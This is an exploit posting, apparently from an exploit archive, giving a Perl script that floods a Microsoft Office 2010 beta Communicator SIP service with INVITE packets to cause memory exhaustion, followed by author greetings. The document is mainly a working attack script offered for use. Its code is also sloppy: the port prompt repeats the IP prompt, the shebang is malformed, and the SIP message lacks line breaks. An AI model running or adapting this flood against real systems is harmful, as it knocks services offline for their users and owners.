======================================================================================== |
| # Title : Microsoft Office ( 2010 beta ) Communicator SIP denial of service Exploit |
| # Author : indoushka |
| # email : indoushka@hotmail.com |
| # Home : www.iqs3cur1ty.com/vb |
| # Tested on: windows SP2 |
| # Bug : Denial of service Exploit |
====================== Exploit By indoushka ================================= |
# Exploit : |
|
#!usr/bin/perl |
####################################################################################################################### |
# Microsoft Office 2010 Communicator allows remote attack to cause a denial of service (memory consumption) via # |
# a large number of SIP INVITE requests. # |
####################################################################################################################### |
|
|
use IO::Socket; |
|
print("\nEnter IP Address of Target Server: \n"); |
$vuln_host_ip = <STDIN>; |
print("\nEnter IP Address of Target Server: \n"); |
$port = <STDIN>; |
|
$sock_sip = IO::Socket::INET->new( PeerAddr => $vuln_host_ip, |
PeerPort => $port, |
Proto => 'udp') || "Unable to create Socket"; |
#if the server is configured on TCP replace 'udp' with 'tcp'. |
|
while(1) |
{ |
print $sock_sip "INVITE sip:arpman.malicious.com SIP/2.0Via: SIP/2.0/UDP 172.16.16.4;branch=123-4567-900"; |
|
} |
|
#program never comes here for execution |
|
close($sock_sip); |
|
Dz-Ghost Team ===== Saoucha * Star08 * Redda * Silitoad * XproratiX * onurozkan * n2n * ======================== |
Greetz : |
Exploit-db Team : |
(loneferret+Exploits+dookie2000ca) |
all my friend : |
His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc) |
Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R (http://www.ilegalintrusion.net/foro/) |
Cyb3r IntRue (avengers team) * The globin * Virus_Hima |
--------------------------------------------------------------------------------------------------------------- |
0 条评论。